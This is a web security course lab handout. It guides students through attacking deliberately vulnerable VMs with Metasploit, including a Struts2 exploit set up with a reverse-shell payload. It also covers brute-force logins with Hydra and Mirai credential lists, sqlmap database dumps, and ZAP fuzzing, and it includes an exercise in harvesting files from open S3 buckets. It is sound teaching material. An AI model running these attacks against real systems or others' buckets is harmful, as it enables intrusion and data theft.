CS 410/510: Web Security X1: Labs Setup WFP1, WFP2, and Kali VMs on Google Cloud

Similar documents
CyberP3i Hands-on Lab Series

Advanced Penetration Testing

Penetration Testing with Kali Linux

Web Penetration Testing

3. Apache Server Vulnerability Identification and Analysis

Web vulnerability scanning and exploitation tools

Installing MediaWiki using VirtualBox

Getting Started with the Google Cloud SDK on ThingsPro 2.0 to Publish Modbus Data and Subscribe to Cloud Services

CS155: Computer Security Spring Project #1

Lab 5: Web Attacks using Burp Suite

CIS 76 Ethical Hacking Building an open source Pentest Sandbox, carrying out a Remote Code Execution exploit, and Remediating the RCE vulnerability.

We want to install putty, an ssh client on the laptops. In the web browser goto:

Vulnerability Assessment using Nessus

Lab 3: Introduction to Metasploit

Downloading and installing Db2 Developer Community Edition on Ubuntu Linux Roger E. Sanders Yujing Ke Published on October 24, 2018

Python web frameworks

Web Application Penetration Testing

Metasploit. Installation Guide Release 4.4

CIS 700/002 : Special Topics : OWASP ZED (ZAP)

Deploy and Secure an Internet Facing Application with the Barracuda Web Application Firewall in Amazon Web Services

Jacksonville Linux User Group Presenter: Travis Phillips Date: 02/20/2013

GAUTAM SINGH STUDY MATERIAL SOFTWARE QUALITY Unit 17. Metasploit

Testing from the Cloud: Is the sky falling?

A framework to 0wn the Web - part I -

Module 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services

Installing Oxwall completely in Amazon Cloud

C o n t e n t S i n D e ta i l FOrewOrd by Matt Graeber xii PreFaCe xvii C# CraSH COurSe FuzzinG and exploiting xss and SQL injection

Evaluating Website Security with Penetration Testing Methodology

Preparing Your Google Cloud VM for W4705

Computer Security Coursework Exercise CW1 Web Server and Application Security

Download and install MySQL server 8 in Windows. Step1: Download windows installer

An introduction to Docker

Cloud Computing II. Exercises

CONTENTS IN DETAIL. FOREWORD by HD Moore ACKNOWLEDGMENTS INTRODUCTION 1 THE ABSOLUTE BASICS OF PENETRATION TESTING 1 2 METASPLOIT BASICS 7

Barracuda Web Application Firewall Foundation - WAF01. Lab Guide

OPENSTACK CLOUD RUNNING IN A VIRTUAL MACHINE. In Preferences, add 3 Host-only Ethernet Adapters with the following IP Addresses:

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

java -jar Xmx2048mb /Applications/burpsuite_pro_v1.5.jar

HHC 2017 writeup, by RedTeam611

Alarm Counter. A Ceilometer OpenStack Application

Web Attacks Lab. 35 Points Group Lab Due Date: Lesson 16

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

w3af - Web application attack and audit framework Documentation

Lab 2 Third Party API Integration, Cloud Deployment & Benchmarking

Setting up Docker Datacenter on VMware Fusion

AUTHOR CONTACT DETAILS

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant

Lab 4: Metasploit Framework

Web client programming

OpenStack Havana All-in-One lab on VMware Workstation

w3af - Web application attack and audit framework Documentation

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Exercises. Cacti Installation and Configuration

Exercises. Cacti Installation and Configuration

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

Bitnami Ruby for Huawei Enterprise Cloud

Testing from the Cloud: Is the sky falling?

Certified Secure Web Application Engineer

Lab E2: bypassing authentication and resetting passwords

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection

Infoblox Kubernetes1.0.0 IPAM Plugin

Inception Cloud User s Guide

Tensorflow/SyntaxNet. Installation Guide

w3af - Web application attack and audit framework Documentation

CLEO VLTrader Made Simple Guide

SQL Injection Attack Lab

Ubuntu LTS Install Guide

CSC 564: SQL Injection Attack Programming Project

TangeloHub Documentation

Bitnami JRuby for Huawei Enterprise Cloud

Bitnami MEAN for Huawei Enterprise Cloud

Using RDP with Azure Linux Virtual Machines

Hacking Our Way to Better Security: Lessons from a Web Application Penetration Test. Tyler Rasmussen Mercer Engineer Research Center

CSCI 350 Virtual Machine Setup Guide

HTTP request proxying vulnerability

SQL Server vnext on Linux Ubuntu - Part 1

Lab 6: OWASP, Backdoors and Web Discovery

CDX REPORT TEAM #8 JACOB CHAPMAN SNEHESH THALAPANENI DEVISHA SRIVASTAVA

Ftp Get Command Line Linux Proxy Settings Via

Module 14: SQL Injection

Qualys Cloud Platform


Contents. Note: pay attention to where you are. Note: Plaintext version. Note: pay attention to where you are... 1 Note: Plaintext version...

1. Download the latest version of the Kali Linux 64 bit ISO image:

Bitnami MariaDB for Huawei Enterprise Cloud

Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion

Load Balancing Web Servers with OWASP Top 10 WAF in Azure

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Cisco Modeling Labs OVA Installation

Creating a Yubikey MFA Service in AWS

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Labtainer Student Guide

Load Balancing Nginx Web Servers with OWASP Top 10 WAF in Azure

Singularity: container formats

Introduction to Ethical Hacking

Installation of the DigitalSystemsVM virtual machine

SUSE Cloud Admin Appliance Walk Through. You may download the SUSE Cloud Admin Appliance the following ways.

WebGoat Lab session overview

ULTEO OPEN VIRTUAL DESKTOP DEBIAN WHEEZY (7.0) SUPPORT

Transcription:

CS 410/510: Web Security X1: Labs Setup WFP1, WFP2, and Kali VMs on Google Cloud Go to Google Cloud Console => Compute Engine => VM instances => Create Instance For the Boot Disk, click "Change", then in the upper tab click "Custom images". In drop-down select cs410fall17 (famous-empire-181720) Select the image ( wfp1 / wfp2 / kalivm ). Enable HTTP for each VM Note that one of the Metasploit exploits we will be running will force a server to spawn a shell and send it back to port 80 on the Kali VM Login credentials wfp1 and wfp2 => wfp : wfp kali => root : cs410510 Note that there is an IP address access control that only allows requests from IP address ranges within your Google Cloud VM (10.x.x.x) addresses or from PSU (131.252.x.x) Note both the external and internal IP address of each instance. We will be using the internal IP address for the attacks, but will need to connect via the external IP addresses initially. wfp1_external_ip, wfp1_internal_ip wfp2_external_ip, wfp2_internal_ip ssh into your kalivm instance and change the root password ssh root@< kali_external_ip> Then, when logged in: type passwd Metasploit Apache Struts2 on Google Cloud Create a vulnerable Apache Struts2 instance on Google Cloud Platform Install a Ubuntu 16.04 VM Enable HTTP Note both the external and internal IP address of the instance ( struts2_external_ip / struts2_internal_ip ) Install docker on the VM curl -fssl https://download.docker.com/linux/ubuntu/gpg sudo apt-key add -

sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" sudo apt-get update sudo apt-get install -y docker-ce Run the vulnerable Apache Struts2 container Note that the vulnerable container puts the web site on port 8080. The docker command remaps it to port 80 on the host VM sudo docker run -p 80:8080 -it piesecurity/apache-struts2-cve-2017-5638:latest Test the instance by visiting http://<struts2_external_ip> From a linuxlab terminal, ssh into the Kali VM ssh root@<kali_external_ip> ( password is cs410510) Launch Metasploit via the shell ( msfconsole ) Type search struts2 to find Struts2 vulnerabilities Find the one that compromised Equifax (March 7, 2017) and type in the use command Command should be like use exploit/multi/http/struts2_ Set the target IP address and port of vulnerable Struts2 instance set RHOST <struts2_internal_ip> set RPORT 80 Set the target URI for the exploit set TARGETURI /showcase Set and configure the payload you want to execute after exploitation In this case, we will invoke a shell and connect it back up to port 80 of our Kali VM set PAYLOAD linux/x64/shell/reverse_tcp set LHOST <kali_internal_ip> set LPORT 80 show options

Run the exploit exploit A shell session is given that allows you to execute commands on the vulnerable container Record the screenshots in your lab notebook

Metasploit WFP on Google Cloud From a linuxlab terminal, ssh into the Kali VM Directory scan on WFP1 Load the dir_scanner script msf > use auxiliary/scanner/http/dir_scanner Show which file is being used for the credentials msf > show options Set the target to your WFP1 instance msf auxiliary(dir_scanner) > set RHOSTS <wfp1_internal_ip> Run the attack msf auxiliary(dir_scanner) > exploit Show the results in your lab notebook Brute-force HTTP auth on WFP2 Load the http_login brute-force script msf > use auxiliary/scanner/http/http_login Set the target to your WFP2 instance msf auxiliary(http_login) > set RHOSTS <wfp2_internal_ip> Set the URI to Authentication #1 msf auxiliary(http_login) > set AUTH_URI /authentication/example1/ Run the attack msf auxiliary(http_login) > exploit Scroll up to find successful login Note, to only show the result, do the following and then re-run msf auxiliary(http_login) > set VERBOSE false sqlmap on Google Cloud From Kali VM WFP1 SQL injection #1 Run sqlmap on first SQL injection example sqlmap -u 'http://<wfp1_internal_ip>/sqli/example1.php?name=root' --batch --dbms mysql --dump List the injection points discovered and the payloads used to exploit them. Show the dump of the user table WFP1 SQL injection #2

In this exercise, spaces are removed. One can use built-in tamper scripts in sqlmap to substitute other white space characters such as tab or newline In addition, sqlmap can dump the entire database using blind injection with a time-based metric. Run all tests and output the results sqlmap -u 'http://<wfp1_internal_ip>/sqli/example2.php?name=root' --dbms mysql --dump --tamper=space2randomblank natas15 Blind SQL injection (Try this at off peak time when no one is using it) In this exercise, the server code below queries the backend database table to determine if a user exists. Unfortunately, it is injectable. While it will not give out any contents of the database directly, it is vulnerable to a blind attack

One can write a Python program (as you did in Program #1) to find the password for natas16 and as described in the course slides. However, sqlmap can perform the attack automatically for you. Solve this level via sqlmap by issuing the following sqlmap -u 'http://natas15.natas.labs.overthewire.org' --auth-type basic --auth-cred natas15:awwj0w5cvxrziongz9j5stnvkmxdk39j --data username=foo --dbms mysql --dump --level 2 --batch --time-sec 1 The meaning of the flags is as follows: '--auth-type', '--auth-cred': Lets sqlmap log into the challenge via Basic-Auth '--data': Tells sqlmap that you want it to try to inject into the POST parameter username.

Hydra On Kali VM '--dbms': For efficiency, tell sqlmap the backend. '--dump': Dump the all the information in all tables. '--level': Setting this above 1 (max 5) tells sqlmap to try more attack-types and payloads. The payload we need isn't included at level 1, so we'll set this to 2. '--batch': Tells sqlmap not to prompt us with questions, and just use the default behavior. '--time-sec': Sleep time to inject when doing timing-based attacks. You might need to raise this if your connection to the natas server is overloaded. The attack takes about ten minutes to run, much of which is due to sqlmap dumping the entire user database with a time-based attack. Use Hydra and the Mirai username and password lists in /usr/share/wordlists/metasploit to automatically search for the credentials of the Authentication #1 level of Web For Pentester II Use the -L flag to specify a file of usernames Use the -P flag to specify a file of passwords HTTP GET URLs can be specified as http-get://<wfp2_internal_ip>/authentication/example1 Re-run command using the -V flag to see the list of credentials checked

Additional linuxlab exercises are for CS 510 students to complete Kali VM Setup on linuxlab Install on linuxlab Download the Kali VM image via BitTorrent Get the torrent file wget https://images.offensive-security.com/virtual-images/k ali-linux-2017.2-vbox-amd64.torrent Open it in BitTorrent client deluge deluge./kali-linux-2017.2-vbox-amd64.torrent Click on Options, then click on Download Location drop-down, select Other... Select scratch or /disk/trump/scratch to save Click on + Add If above doesn t work then you can copy the file directly from /u/wuchang/kali-linux-2017.2-vbox-amd64.ova Import appliance into VirtualBox Launch VirtualBox Under File => Import Appliance Change the Virtual Disk Image path to /disk/trump/scratch/kali-linux-2017.2-vbox-amd64/kali-linux-2 017.2-vbox-amd64-disk001.vmdk In Settings => Display, uncheck Enable 3D Acceleration Bring up VM, login as root with password toor Launch a terminal and change your password via passwd command

wpscan Within KaliVM on linuxlab Run wpscan against Pentesterlab s vulnerable WordPress ISO On a local VM via the ISO at https://www.pentesterlab.com/exercises/cve-2008-1930 Or against Prof.Wu s own version of it at http://131.252.220.58 Click on Y for the update Click on N to follow the redirection zap Within Kali VM, launch zaproxy in a terminal Click on Accept for the license, then click Yes...I want to persist.. Within Kali VM, set up Firefox to use zaproxy as its HTTP proxy Start Firefox with the profile option in the background firefox -P & Create Profile called zap and Start Firefox with it In the URL window, type about:preferences Goto Advanced => Network (tab) => Connection (Settings ) Click Manual proxy and set HTTP Proxy to localhost and Port to 8080 (This is the default port that zap listens to)

Visit one of the WFP servers on Google Cloud with firefox and verify that it shows up in zap s history window.

Visit SQL example #1 http://<wfp1_external_ip>/sqli/example1.php?name=root Right-click the request in the zap history window and click Attack=>Fuzz Highlight root in the URL and Add it to Fuzz Locations on the right

Click on Add to set payload to fuzz the field with, select File Fuzzers, expand jbrofuzz, click SQL Injection, then click Add Start the Fuzzer Sort by the size of the response body to find all strings that returned the entire user database Repeat for another SQL example of your choice Visit XSS example #1 http://<wfp1_external_ip>/xss/example1.php?name=hacker In zap history, right-click URL and click Attack=>Active Scan Click on Show advanced options and then on Input Vectors tab, then deselect POST Data Start scan and find the Cross Site Scripting alert in Alerts tab Visit Google s XSS firing range http://public-firing-range.appspot.com/ Click on Reflected XSS, then Parameter - Body In zap s history, right-click on the GET request from the link, then select Attack=>Active Scan Click on Show advanced options and then on Input Vectors tab, select URL Query String and deselect all others In the Policy tab, set the Threshold of all Tests to OFF except for Cross Site Scripting which you set to LOW. Start Scan Click on the Alerts tab above the bottom window of zap. Click on the Alert for the URL and show the attack vector that was used to generate the alert. Visit WebScanTest http://webscantest.com Click on OS Command Inject Tests at the bottom Click on This is vulnerable to cmd inject Lookup a name in form Bring up request in zap s history and right-click the POST request Click Attack=>Active Scan Select Input Vectors, deselect URL Query String, and select POST Data (since form takes input as POST) Select Policy tab and then Injection. Under Threshold column, turn everything to OFF except

Remote OS Command Injection which should be set to Low. In the Strength column for this row, select Low as well. Start scan Sort results by response size and list the request and response of the top result w3af Install On linuxlab rsync -a /u/wuchang/w3af./ cd w3af source env/bin/activate./w3af_console Run w3af_console on your Web for Pentester 1 instance Documentation at http://docs.w3af.org/en/latest/ Use tool to identify vulnerabilities in two different OWASP categories automatically Include a screenshot of each one

Run one successful XSS scan in w3af_console on Google s firing range https://public-firing-range.appspot.com bucket-stream Install tool on linuxlab git clone https://github.com/eth0izzle/bucket-stream cd bucket-stream virtualenv -p python3 env source env/bin/activate pip3 install -r requirements.txt python3 bucket-stream.py Run the tool across at least 5000 buckets If an open S3 bucket is found, visit its URL in a browser to obtain the bucket's manifest Then, find a file key within the manifest and append it to the end of the bucket's URL to directly access the file Show a screenshot of the file key in the manifest (manifest is what you get when you hit the URL it finds) Show the contents of the file via direct access within bucket (Within the manifest are the "keys" you can append to download the files directly) Note: If you don t find any open buckets within 5000 buckets, restart it at a later time.

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback